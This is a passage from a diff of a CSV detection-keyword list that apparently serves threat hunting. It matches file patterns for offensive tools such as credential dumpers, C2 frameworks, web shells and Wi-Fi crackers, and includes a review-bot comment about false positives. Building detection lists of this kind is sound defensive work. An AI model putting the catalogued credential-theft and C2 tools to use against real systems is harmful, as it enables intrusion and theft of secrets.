-"*/wapitiCore/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/wapiti-scanner/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/Watson.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/waf__enum/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/wapitiCore/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/wapiti-scanner/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/Watson.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*/wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" 
@@ -5756,14 +5819,17 @@ "*/WDExtract.git*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/WdToggle.c*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/WdToggle.h*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" 
"*/weakpass.git*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" -"*/Web/decouverte.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*/Web/discovery.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"*/Web/decouverte.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/Web/discovery.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "*/web/pwn.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*/web_rce.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/web_rce.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/WebC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/WebDavC2.git*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. 
and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*/web-hacking-toolkit*","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "*/weblistener.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" 
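Review bot: The three NetExec rows added in this hunk (`*/wdigest.py*`, `*/web_delivery.py*`, `*/webdav.py*`) match on a bare file name between wildcards, yet they are enabled for both endpoint and proxy detection (`"1","1"`) with severity `10`, so any path or URL that merely contains, for example, `/webdav.py` would be scored as NetExec. Either anchor each keyword on a tool-specific directory (e.g. `*/<netexec-module-dir>/webdav.py*`, placeholder) or switch proxy matching off and record the caveat in `metadata_comment`, i.e. write those three columns as `"1","0","high risk of false positives"`. All three rows also carry the same technique list and the `Credential Access` category, which looks copied rather than chosen per module and is worth checking for `web_delivery.py` and `webdav.py`. The `*/whoami.py*` row in the following hunk has the same shape; that hunk continues past the visible part.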
@@ -5776,75 +5842,78 @@ "*/webshells/shell.php*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/WebSocketC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/Weevely*","offensive_tool_keyword","weevely","weevely php web shell","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/sunge/Weevely","1","0","N/A","N/A","1","41","113","2012-04-19T18:00:08Z","2012-05-04T13:17:42Z" -"*/Weevely3*","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","2908","607","2023-06-21T14:41:31Z","2014-09-20T10:16:49Z" +"*/Weevely3*","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","2909","606","2023-06-21T14:41:31Z","2014-09-20T10:16:49Z" "*/well_known_sids.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" "*/WerTrigger.git*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*/WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*/whatlicense.git*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*/WheresMyImplant/*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/WhoAmI.task*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/WhoAmI.task*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/whois-domain.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Widgets/LootWidget.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/wifi_hopping.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/Widgets/LootWidget.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/wifi_hopping.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 
- TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/WiFiBroot*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" -"*/wifidump.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*/wifite -c *","offensive_tool_keyword","wifite2","This repo is a 
complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*/wifite2*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*/wikipedia_fr.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*/wikiZ/RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*/wifidump.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/wifite -c *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*/wifite2*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*/wikipedia_fr.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/wikiZ/RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - 
